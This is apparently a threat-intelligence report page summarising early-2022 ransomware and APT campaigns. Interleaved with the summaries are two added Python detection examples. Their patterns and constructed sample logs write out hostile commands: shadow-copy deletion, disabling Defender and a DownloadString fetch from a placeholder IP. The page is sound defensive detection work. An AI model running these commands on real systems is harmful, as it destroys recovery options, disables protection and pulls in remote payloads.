The Anvilogic Threat Reports

Here you can find an accumulation of trending threats published weekly by our Anvilogic team, The Anvilogic Forge. We are committed to helping the community detect attacks: each report points your team at the malicious strings and behaviors to look for, and at exposure checks to run on endpoint devices and servers, which can help identify successful payload delivery and compromise through the vulnerability or technique in question.

Intelligence Levels
  • Tactical: Detectable threat behaviors for response with threat scenarios or threat identifiers
  • Strategic: General information security news, for awareness
About the Team

The Anvilogic Forge is a team of security professionals dedicated to tracking threats and crafting reliable detection strategies for our trusted clients while contributing to our peers in the security industry.

Our mission is to assess the operational behaviors of all threats to provide the community, and our customers, with actionable information and enterprise-ready detections in order to defend themselves in an ever-changing threat landscape.

Our Craft

Curate threat intelligence to provide situational awareness and actionable intelligence to our clients. The results of our craft are:

  • Detections
    • Threat Identifiers: atomic detections that serve as the foundation of our detection framework.
    • Threat Scenarios: risk, pattern, and sequence-based detections utilizing the outputs of Threat Identifiers as a means of identifying actual threats.
  • Reports Hot off the forge:
    • Threat News Reports
    • Trending Threat Reports
    • Research Articles
Want more?

If this information is useful, please feel free to get in touch with us to see how Anvilogic can help you grow your security operations at yo@anvilogic.com.

Sign-up for Anvilogic’s weekly threat reports and receive a threat round-up, active notifications of relevant threats to harden your security posture, and ready-to-deploy threat detection logic & content associated with applicable trending threats.

If you are not a customer but would like to get the detection code for a specific vulnerability or exploit, reach out to us; we’re happy to help: detection.support@anvilogic.com

Learn More about The Anvilogic Threat Detection and Incident Response (TDIR) Platform


Ransomware Targets European Oil and Chemical Sectors

February 08, 2022

As reported by The Record, a series of ransomware attacks has been targeting oil and chemical suppliers in Belgium, the Netherlands and Germany. While the attacks have not been identified as linked, European officials investigating the matter have associated them with the BlackCat and Conti ransomware groups.

Koxic Ransomware

February 08, 2022


Industry: N/A | Level: Tactical | Source: Cyble

Research from Cyble Research Labs provides a deep-dive analysis of Koxic ransomware. During execution, the sample collects system information and modifies registry keys to assist with lateral movement and to tamper with system defenses such as Windows Defender and anti-virus. Any running security applications are terminated and shadow copies are deleted. Prior to encryption, sensitive information is collected and written to a file in TEMP. Once the desired data is collected, it is exfiltrated to the attacker and the ransom note is distributed to victim hosts in the environment. Encrypted files are appended with the extension “KOXIC_KLIBD.”

  • Anvilogic Scenario: Koxic Ransomware
  • Anvilogic Use Cases:
    • Executable Process from Suspicious Folder
    • Modify Registry Key
    • Inhibit System Recovery commands
    • Output to File

SEO Poisoning dropping malware

February 08, 2022


Industry: N/A | Level: Tactical | Source: Mandiant

Mandiant Managed Defense has identified a threat campaign distributing BATLOADER malware and malicious installations of the ATERA remote management software. The operators build websites themed around free software and use search engine optimization (SEO) poisoning to lure victims searching for it. The malicious webpages incorporate a Traffic Direction System (TDS) that checks visitor attributes to decide whether to serve the malicious or a legitimate page, which helps the sites avoid detection by security researchers. Two different infection chains are used. In the BATLOADER chain, users attempting to download the advertised software receive an installer that runs native tools such as PowerShell, Msiexec.exe and Mshta.exe to evade detection; a notable file, “AppResolver.dll”, contains a malicious VBScript that is executed with Mshta.exe. In the ATERA chain, an MSI file is dropped to install the ATERA agent. The Splashtop remote access software bundled with the agent is also installed to maintain persistence, and scripts are then pushed from the agent to tamper with the host by modifying Windows Defender file exclusions and downloading additional payloads. Currently, the activity is not attributed to a known threat actor group; however, there is some overlap in techniques with the Conti playbooks leaked in August 2021.

  • Anvilogic Scenario: Malicious Software Download via MSI
  • Anvilogic Use Cases:
    • MSHTA.exe execution
    • MSIExec Install MSI File
    • Modify Windows Defender
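The use cases listed under the Koxic and SEO-poisoning reports above are atomic threat identifiers, and each report's scenario is the pattern built on top of them (the identifier/scenario split described under Our Craft). The following is an added example, not Anvilogic's detection content or code, of that pattern in working form: six identifiers written as stateless predicates over constructed process-creation events, and two scenarios that fire when one host trips enough distinct identifiers inside a time window. The event field names, the match patterns, the thresholds and the sample events are this example's own assumptions.

```python
"""Atomic threat identifiers feeding sequence-based threat scenarios.

Added example, not Anvilogic's content. Events are constructed here and
modelled on process-creation telemetry (host, time, image path, command
line). Identifier and scenario names reuse the use-case names from the
Koxic and SEO-poisoning reports; the patterns and thresholds are assumed.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# ---- threat identifiers: one predicate per event, no state ----------------
SUSPICIOUS_DIRS = re.compile(r"\\(temp|programdata|users\\public)\\", re.I)
INHIBIT_RECOVERY = re.compile(
    r"vssadmin(\.exe)?\s+delete\s+shadows|wmic(\.exe)?\s+shadowcopy\s+delete"
    r"|bcdedit(\.exe)?\s.*(recoveryenabled\s+no|bootstatuspolicy\s+ignoreallfailures)"
    r"|wbadmin(\.exe)?\s+delete\s+catalog", re.I)
DEFENDER_KEY = re.compile(
    r"reg(\.exe)?\s+add\s.*windows defender.*(disableantispyware|disablerealtimemonitoring)", re.I)
DEFENDER_EXCLUSION = re.compile(r"add-mppreference\s+-exclusion(path|process|extension)", re.I)

def image_is(ev, name):
    return ev["image"].lower().endswith("\\" + name)

def msiexec_install(ev):
    return image_is(ev, "msiexec.exe") and re.search(r"\s/(i|package)\b", ev["cmd"], re.I) is not None

IDENTIFIERS = {
    "Executable Process from Suspicious Folder": lambda ev: bool(SUSPICIOUS_DIRS.search(ev["image"])),
    "Inhibit System Recovery commands": lambda ev: bool(INHIBIT_RECOVERY.search(ev["cmd"])),
    "Modify Registry Key": lambda ev: bool(DEFENDER_KEY.search(ev["cmd"])),
    "MSHTA.exe execution": lambda ev: image_is(ev, "mshta.exe"),
    "MSIExec Install MSI File": msiexec_install,
    "Modify Windows Defender": lambda ev: bool(DEFENDER_EXCLUSION.search(ev["cmd"])),
}

# ---- threat scenarios: (identifier set, distinct hits required, window) ---
SCENARIOS = {
    "Koxic Ransomware": ({"Executable Process from Suspicious Folder", "Modify Registry Key",
                          "Inhibit System Recovery commands"}, 2, timedelta(minutes=10)),
    "Malicious Software Download via MSI": ({"MSHTA.exe execution", "MSIExec Install MSI File",
                                             "Modify Windows Defender"}, 2, timedelta(minutes=30)),
}

def run_identifiers(events):
    """Return (host, timestamp, identifier) hits in time order."""
    hits = []
    for ev in sorted(events, key=lambda e: e["ts"]):
        hits.extend((ev["host"], ev["ts"], name) for name, pred in IDENTIFIERS.items() if pred(ev))
    return hits

def run_scenarios(hits):
    """Slide a window over each host's hits; alert on enough distinct identifiers."""
    by_host = defaultdict(list)
    for host, ts, name in hits:
        by_host[host].append((ts, name))
    alerts = set()
    for host, host_hits in by_host.items():
        for scenario, (wanted, min_hits, window) in SCENARIOS.items():
            relevant = [(ts, n) for ts, n in host_hits if n in wanted]
            for i, (start, _) in enumerate(relevant):
                seen = {n for ts, n in relevant[i:] if ts - start <= window}
                if len(seen) >= min_hits:
                    alerts.add((host, scenario))
                    break
    return alerts

def detect(events):
    return run_scenarios(run_identifiers(events))

# ---- constructed sample telemetry (not real logs) -------------------------
T0 = datetime(2022, 2, 8, 9, 0)
SAMPLE_EVENTS = [
    # WS01: dropper runs from Temp, disables Defender via the registry, wipes shadow copies
    {"host": "WS01", "ts": T0, "image": r"C:\Users\bob\AppData\Local\Temp\setup.exe", "cmd": "setup.exe"},
    {"host": "WS01", "ts": T0 + timedelta(minutes=1), "image": r"C:\Windows\System32\reg.exe",
     "cmd": r'reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f'},
    {"host": "WS01", "ts": T0 + timedelta(minutes=2), "image": r"C:\Windows\System32\vssadmin.exe",
     "cmd": "vssadmin.exe delete shadows /all /quiet"},
    # WS02: mshta runs a script hidden in a DLL, an MSI agent is installed, an exclusion is added
    {"host": "WS02", "ts": T0, "image": r"C:\Windows\System32\mshta.exe",
     "cmd": r"mshta.exe C:\Users\alice\AppData\Local\Temp\AppResolver.dll"},
    {"host": "WS02", "ts": T0 + timedelta(minutes=5), "image": r"C:\Windows\System32\msiexec.exe",
     "cmd": r"msiexec.exe /i C:\Users\alice\Downloads\agent.msi /qn"},
    {"host": "WS02", "ts": T0 + timedelta(minutes=6), "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": r'powershell.exe -Command "Add-MpPreference -ExclusionPath C:\ProgramData"'},
    # WS03: routine admin work; a single identifier fires but no scenario completes
    {"host": "WS03", "ts": T0, "image": r"C:\Windows\System32\msiexec.exe",
     "cmd": r"msiexec.exe /i C:\Users\carol\Downloads\vendor-tool.msi /qn"},
    {"host": "WS03", "ts": T0 + timedelta(hours=1), "image": r"C:\Windows\System32\vssadmin.exe",
     "cmd": "vssadmin.exe list shadows"},
]

if __name__ == "__main__":
    for host, scenario in sorted(detect(SAMPLE_EVENTS)):
        print(f"{host}: {scenario}")
```

Running it reports WS01 for the Koxic scenario and WS02 for the MSI scenario, while WS03's lone msiexec install stays an identifier hit without becoming an alert. That is the point of the two-tier design: identifiers such as "MSIExec Install MSI File" or "Modify Registry Key" are far too noisy to page on alone, and the scenario threshold and window are what turn them into a signal. The patterns here are deliberately narrow (only Defender policy keys, only the common shadow-copy commands); a production identifier would cover more command variants and the equivalent PowerShell and WMI paths.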

MuddyWater APT Group

February 08, 2022


Industry: N/A | Level: Tactical | Source: Cisco Talos

Cisco Talos has published research on the latest activity of the Iranian APT group MuddyWater, which has been attributed to Iran’s Ministry of Intelligence and Security (MOIS). The threat group has been targeting users in Turkey with malicious PDFs, Office documents and Windows executables to establish initial access. As with most threat actors, living-off-the-land binaries (LoLBins) are leveraged to evade detection, with VBS scripts and DLLs prominently used. Upon execution of the malicious document, persistence is established through registry key modifications, and the group has incorporated canary tokens into its attack scheme: the VBA code makes HTTP requests to canarytokens[.]com, which notifies the token’s owner that an “object was opened.” The tokens give the attack several capabilities, such as tracking code execution, an anti-analysis “timing check,” and the possibility that “the server that hosts the final payload may only deliver if it first receives two almost simultaneous requests to the token.”

  • Anvilogic Scenario: Malicious Document Delivering Malware
  • Anvilogic Use Cases:
    • Malicious Document Execution
    • Wscript/Cscript Execution
    • New AutoRun Registry Key
    • Suspicious Registry Key Created

Phosphorus/APT35 New PowerLess Trojan

February 08, 2022


Industry: N/A | Level: Tactical | Source: Cybereason

Research from Cybereason identifies the Iranian group Phosphorus (also tracked as APT35 and Charming Kitten) using a new PowerShell tool, the “PowerLess Backdoor,” while also exploiting the Log4Shell vulnerability. The malware can download additional payloads for information stealing, but its notable feature is a stealth technique described in the report: “to avoid PowerShell detection by running the PowerShell Backdoor in a .NET context rather than spawning the PowerShell process.” The evasion tactic does not prevent PowerShell events from being logged. The only case in which a PowerShell process is spawned is when a process needs to be killed. Based on IOCs reviewed by Cybereason, the attack infrastructure is highly active, and one observed IP address overlaps with Memento ransomware, suggesting a potential connection between the threat actor group and the ransomware operation.

  • Anvilogic Use Cases:
    • Executable Process from Suspicious Folder
    • Suspicious Powershell
    • Potential CVE-2021-44228 – Log4Shell
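The hosting trick above removes powershell.exe from the process tree, but the engine still writes its own logs, and the detection pivot moves from the process name to the host that loaded the engine. The following added example (not Cybereason's or Anvilogic's code or content) shows that pivot over constructed records modelled on two Windows log sources: the classic "Windows PowerShell" log's event 400, whose message lists HostName and HostApplication when an engine starts, and Microsoft-Windows-PowerShell/Operational event 4104 script block logging. The record layout, the sample host paths and the sample scripts are assumptions made for the example.

```python
"""Flag a PowerShell engine started inside a process that is not powershell.exe.

Added example, not Cybereason's or Anvilogic's content. Records are
constructed and modelled on event 400 (engine lifecycle; message carries
HostName/HostApplication) and event 4104 (script block text). Both events
carry the writing process id in their system metadata, which is what lets
the two be joined below.
"""
import ntpath
import re

EXPECTED_HOSTS = {"powershell.exe", "pwsh.exe", "powershell_ise.exe"}  # tune per environment
KV = re.compile(r"^\s*(\w+)=(.*?)\s*$", re.M)          # "Key=Value" detail lines of event 400
EXE_PATH = re.compile(r"^(.*?\.exe)\b", re.I)          # HostApplication is a path plus arguments

def parse_engine_event(message):
    """Return the key=value detail lines of an event 400 message as a dict."""
    return dict(KV.findall(message))

def host_executable(host_application):
    """Basename of the hosting executable, tolerating spaces inside the path."""
    m = EXE_PATH.match(host_application)
    path = m.group(1) if m else host_application.split(" ")[0]
    return ntpath.basename(path).lower()

def unexpected_hosts(events):
    """pid -> hosting executable for every engine start outside EXPECTED_HOSTS."""
    found = {}
    for ev in events:
        if ev["id"] != 400:
            continue
        exe = host_executable(parse_engine_event(ev["message"]).get("HostApplication", ""))
        if exe not in EXPECTED_HOSTS:
            found[ev["pid"]] = exe or "<unknown>"
    return found

def flag_script_blocks(events):
    """Script blocks (4104) written by a process whose engine was hosted unexpectedly."""
    hosts = unexpected_hosts(events)
    return [(ev["pid"], hosts[ev["pid"]], ev["script"])
            for ev in events if ev["id"] == 4104 and ev["pid"] in hosts]

def engine_message(host_name, host_application):
    """Build an event 400 message body in the layout the log uses (constructed)."""
    return "\n".join(["Engine state is changed from None to Available.", "", "Details:",
                      "\tNewEngineState=Available", "\tPreviousEngineState=None",
                      "\tHostName=" + host_name, "\tHostApplication=" + host_application])

SAMPLE_EVENTS = [  # constructed records, not real telemetry
    {"id": 400, "pid": 1234, "message": engine_message(
        "ConsoleHost", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile")},
    {"id": 4104, "pid": 1234, "script": "Get-Process | Sort-Object CPU -Descending"},
    {"id": 400, "pid": 5678, "message": engine_message(
        "Default Host", r"C:\Users\alice\AppData\Local\Temp\updater.exe")},
    {"id": 4104, "pid": 5678, "script": "(New-Object Net.WebClient).DownloadString('http://198.51.100.7/c')"},
    {"id": 4104, "pid": 5678, "script": "Stop-Process -Id 4321 -Force"},
]

if __name__ == "__main__":
    for pid, exe, script in flag_script_blocks(SAMPLE_EVENTS):
        print(f"pid {pid} hosted by {exe}: {script}")
```

Only the two script blocks from pid 5678 are reported; the console session on pid 1234 is left alone. Two caveats apply in practice. Script block logging has to be enabled for 4104 to exist at all, so this check is only as good as the logging policy it relies on, and legitimate products do host the engine inside their own executables, so EXPECTED_HOSTS is an allowlist to build from a baseline of the environment rather than a fixed set.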

Antlion APT Group

February 08, 2022


Industry: Financial & Manufacturing | Level: Tactical | Source: Symantec

Symantec reports threat activity from Antlion, a Chinese state-backed APT group that has been actively targeting Taiwanese financial institutions for the past 18 months. The group’s operations involve long dwell times: in recent attacks, the group spent approximately 250 days on the network of a financial organization and 175 days on the network of a manufacturing organization. The group leverages a custom backdoor, xPack. In a case study, the group was observed running various commands (for example via WMI), exploiting the EternalBlue SMB vulnerability, gathering credentials from the registry, running PsExec and archiving collected data. There are unexplained gaps in the threat activity, further emphasizing the group’s slow, methodical pace.

  • Anvilogic Use Cases:
    • WinRM Tools
    • Credentials in Registry
    • Remote Admin Tools
    • Locate Credentials

Gamaredon/ACTINIUM & Ukraine

February 08, 2022

In-depth research by Palo Alto Networks Unit 42 and the Microsoft Threat Intelligence Center (MSTIC) found that the threat group Gamaredon/ACTINIUM has been actively targeting organizations in Ukraine.

Global Affairs Canada Cyberattack

February 01, 2022


Industry: Government | Level: Strategic | Source: BleepingComputer

Global Affairs Canada (GAC) detected a cyberattack on January 19th, 2022, resulting in network disruptions. The attack was mitigated and critical services remain available; however, some online services are still unavailable while recovery efforts continue. GAC manages foreign and consular relations for the Canadian government, and the current review of the incident has not identified any impact on other government departments.

US Bans China Unicom Americas

February 01, 2022


Industry: Telecommunications | Level: Strategic | Source: BleepingComputer

On January 27th, 2022, the United States Federal Communications Commission (FCC) issued an order for China Unicom Americas to cease its services in the US within 60 days. The decision to revoke the China Unicom subsidiary’s license was based on security concerns. In the FCC’s statement, “The Order finds that China Unicom Americas’ ownership and control by the Chinese government raise significant national security and law enforcement risks by providing opportunities for China Unicom Americas, its parent entities, and the Chinese government to access, store, disrupt, and/or misroute US communications, which in turn allow them to engage in espionage and other harmful activities against the United States.”

US Federal Government Initiative to protect Water Systems

February 01, 2022

In an effort to improve the defense of US critical infrastructure, the US government and the Environmental Protection Agency (EPA) are initiating a new “action plan” focused on securing the water sector.